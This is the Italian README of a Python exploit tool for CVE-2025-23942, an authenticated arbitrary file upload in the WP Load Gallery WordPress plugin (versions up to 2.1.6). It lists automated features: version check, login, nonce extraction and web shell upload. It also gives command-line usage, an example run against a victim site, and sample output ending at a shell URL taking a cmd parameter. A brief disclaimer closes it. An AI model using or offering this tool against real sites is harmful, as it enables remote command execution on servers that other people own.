
WP Load Gallery <= 2.1.6 - Caricamento File Arbitrario Autenticato (Autore+)
Vulnerabilità di caricamento senza restrizioni di file con tipo pericoloso in NgocCode WP Load Gallery che permette di caricare una Web Shell su un server web. Questa vulnerabilità riguarda WP Load Gallery: da n/a fino a 2.1.6.
✅ Sfruttamento automatizzato – Estrae il nonce, effettua l'accesso e carica automaticamente la shell.
✅ Controllo versione – Conferma se il target è vulnerabile prima dello sfruttamento.
✅ Gestione errori – Garantisce un'esecuzione fluida anche in caso di fallimenti.
✅ Gestione sessione – Utilizza una gestione persistente della sessione per l'autenticazione.
✅ Feedback in tempo reale – Fornisce output ad ogni passo.
requests (pip install requests)Esegui lo script con i parametri necessari:
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit WP Load Gallery - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
Esempio:
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
[+] Controllo versione del plugin...
[+] Versione rilevata: 2.1.6
[+] Il target è vulnerabile! Procedo con lo sfruttamento...
[+] Accesso effettuato con successo.
[+] Estrazione del wplg_nonce...
[+] wplg_nonce estratto: a1b2c3d4e5
[+] Caricamento della shell...
[+] File caricato con successo!
[+] Shell accessibile a: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
Questo exploit è inteso solo per scopi educativi e di ricerca sulla sicurezza. Non usarlo su sistemi di cui non sei il proprietario o per cui non hai esplicito permesso di test. L'autore non è responsabile per qualsiasi uso improprio di questo script. ( Khaled_alenazi )